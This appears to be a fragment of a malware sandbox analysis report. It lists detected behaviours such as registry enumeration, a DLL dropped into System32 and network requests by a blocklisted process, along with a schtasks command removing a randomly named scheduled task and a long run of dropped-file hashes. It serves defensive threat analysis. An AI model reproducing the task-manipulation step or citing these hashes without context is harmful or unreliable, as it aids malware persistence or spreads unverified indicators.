- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xOSrYfgHudgkQpnQd"3⤵PID:2492
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a6f54e2191bb24909b8af3a1932533c3
SHA1710fa2d1b3f3dacf6bc91d3ba79f633a3c73cd33
SHA256044445a7586979e6088fbb41c125214bce25d903ee8b0034a5e3c6593471bf71
SHA5125c6f2cc3402cd0d206862bec48b2c4e9217cbfe639100f94ef82af5d93511fbeb19e71e2e0696aca3f83bf24e7ca5564b6b38a8857de75f33da068c2095ae75d
-
Filesize
2KB
MD5caac1cf14c0816c9634f1eba15e0a770
SHA1ae98f43098aafe95fbb6114926e5b7e10965ce53
SHA256aeb34df7450bd845a03a2910b97e3bd12b125234dccedcc9f951659a44cf526c
SHA512a91845699723dce4d2728b4efe1ed07a02b88fee6658f986bd4ab1d19634b113b66df53434cdd732e9dc9c69dcb6a8556a812b0129a5e0da95f651e1b5cee2ce
-
Filesize
2KB
MD5509ddf32ba2bace374bc558e40abff75
SHA1fe5aeb7c52800229505ba9dc69734385b3961fa5
SHA2569425bbb0680ce446e7b2c13e087dff7237d84bee09bbb48141a791cb6b852dd2
SHA51280132a543830aa65fe1a2e3fc4fa860818b3d53fe9ef63ac43f9d21032aae624900e29ad5ca7aa8b9697149bd1911b54dc0ff78045f1f523364e96b027a669ec
-
Filesize
2KB
MD5e5a5e8c948e660084a8c41a09e957f02
SHA1951eb9cf7e476278cdb3c2b04257178724c57eaf
SHA256e941f0d08479d9f3e8b21e4811703ef8887c9c98ade46cc62ceef8d7fa2d70a0
SHA512fe6e45ad7558e1fcc30fcf18ca8d6d43c26f875bdeecca3136b6901aeade5bed82c0b0dbff10525594719b1d0b4d5407ac93943daab01ded4fa3b3a82f7048c1
-
Filesize
1.1MB
MD5904a817e1c218d8482fd1f04e08bc92e
SHA1c2065e4914ba77a0618480d99d69df0a7c2a9c3c
SHA256d33b3377a4b900b235e5a4fe52e89453b38867a5c07f06b9c9c6ac8aab9347b1
SHA512b947c5409508e17580e3b2d9e601f3c4ed38a8c0dc9b1660e7ecdd1a358c0643105e4ce112403def4bdbae32b3f4fb6d01a8598d3116aa79f617a7b31ec2bedc
-
Filesize
2KB
MD54bfbc4b5b9f425662ebb17bfd91b0b68
SHA108da644158f294a06e65c49497b1f6ed3eef2105
SHA2565cbe604954730046c7ceeaf26067a3d26a7289c8fe45d7ad2611c71f6681f977
SHA512fc63248a6a29865882f6d3b29c7f4a9880c20f0446024a28facdab2123d105bac1f266ebd2939fe8f3d2a80a756f5e289ae9bb17a245f403948024739914ca3b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5f5752a5c59cabfa44cfe88fbbd898800
SHA1b9c3f8722b9263da78e94d97975325875de3b6e5
SHA2560c5638bce576db83100138baf9875b996c191efd4b838b74827efbf22a43e03a
SHA5120d3a2b6ba5d34815bd4b35ce2a0161d02b39b589fad043a99e5dbfacf59ce93fb41bd969815d347e74d2733235f815c44e418730a56e538e0f329124d655a11a
-
Filesize
28KB
MD50af303cb638a385584f32e80cbb58c64
SHA102b275b4b62edc3f26b262f88c9d1e05057f0791
SHA2568c796d36599b9cb71c643d576e4f62a2b6b79c7eba25951c9ceedbbdf0202b29
SHA5127524cc0563972a8a8cbc2dca39373ba395a94a22662570ad26ad3f6aafb02cd99f8b47356ea23c86850dc6c9a783046cc3245dadada0662594cc574137f208eb
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD58e983f97be9936661e5c617a1ba90184
SHA1fecba62e43495acdf2dea68cd4c686caefdc8d7a
SHA25610debfa6885feeaf3cf79d74ddb399e830fce294c5157d57c19b29458a211b54
SHA51281f6c8ad663d8293ea4adfa809c36261099e79f46db2130a42a71edac2efac9d53b777cdb268084205882022a3abb020a1baafb79376f74a09660e98318f6ef3
-
Filesize
6.0MB
MD565919185980a391c10e05c1ad5ee59d8
SHA1ef3625d688776973e0c6241fc0ebee8fece07f38
SHA2561ed6db87d7f6aec1d81536c45de9f098f314289d5309a5775c4715f239342f9c
SHA512772be8ef3adb69d4c9a13afaa2aef33b0e5cd797ef5e80df30b4094c0dbdbcd7cce0fb71848357719f98101976014d38fe90dd9287854182109da5cab7779cc1
-
Filesize
6.0MB
MD565919185980a391c10e05c1ad5ee59d8
SHA1ef3625d688776973e0c6241fc0ebee8fece07f38
SHA2561ed6db87d7f6aec1d81536c45de9f098f314289d5309a5775c4715f239342f9c
SHA512772be8ef3adb69d4c9a13afaa2aef33b0e5cd797ef5e80df30b4094c0dbdbcd7cce0fb71848357719f98101976014d38fe90dd9287854182109da5cab7779cc1
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
7KB
MD52e95160dde16f59807dd68eb814155e4
SHA184ee3e1a57d865512d81f6205a9139e22e185b39
SHA256e2059b16f73a8e3cf1add8b3467cdd10853b7066f3f424fea780a0db7e6c9807
SHA51208ce2333bb6db1e542f22585ec727ce387e5bbb86cd395ff46b545fe4e335a93b1d4774b519938c8d74b765371277026cc2081a0ef20e380d91b28ce08876fe1
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5858c37dbecefb7d8bc1a8b1a1d6998e1
SHA1217c5366f3fadc33e197d9b629ee18724495a6ee
SHA256f3dd492e5d860b074baa38293307d5d9f5ae8fe9f52feb73cbd3bf9849aa4d7a
SHA51258aea17307bf266a066e454d1c74b1807a482274665fa10a227d4a32a6ff39988cc83da9601bb7384a4cc8b92a3d3bfe52aaf772ab8ffb00a83751d69626f780
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.1MB
MD5c0b37f5d94dec15fb4a1bad844ead150
SHA15de19a1da2b185a2dd9325c159ae37f9e5e8ebb2
SHA256e24351f00f7755beeabf19d25304bf6fecc8dcc9c0a307091c2f95974e60a056
SHA512803439c6750de5a9e515cef82d412a8bf3e3dac2a043114065b8242461da9bb8a1283cf93ae9889a63ec583217f9723c1b445a84b5a544a183ea59f399f771ed
-
Filesize
6KB
MD5eecedb6ae53b07e8e22249bd275aebb9
SHA183815d1d4ab7538300c2c8b55bf087ae33ba2cd9
SHA25676e65755542c66df00555d2022378716a9a4e9fa2992d6a6595d4ea209ee07e2
SHA512c854bf9da27e26ed36789669f7ceae103c809c5cf06c8f79424ba8bc7fde9b6e3f4bbdd13ff277778144ec80c66593327d9e6b89e41ea185868125e6b48fb931
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD5c0b37f5d94dec15fb4a1bad844ead150
SHA15de19a1da2b185a2dd9325c159ae37f9e5e8ebb2
SHA256e24351f00f7755beeabf19d25304bf6fecc8dcc9c0a307091c2f95974e60a056
SHA512803439c6750de5a9e515cef82d412a8bf3e3dac2a043114065b8242461da9bb8a1283cf93ae9889a63ec583217f9723c1b445a84b5a544a183ea59f399f771ed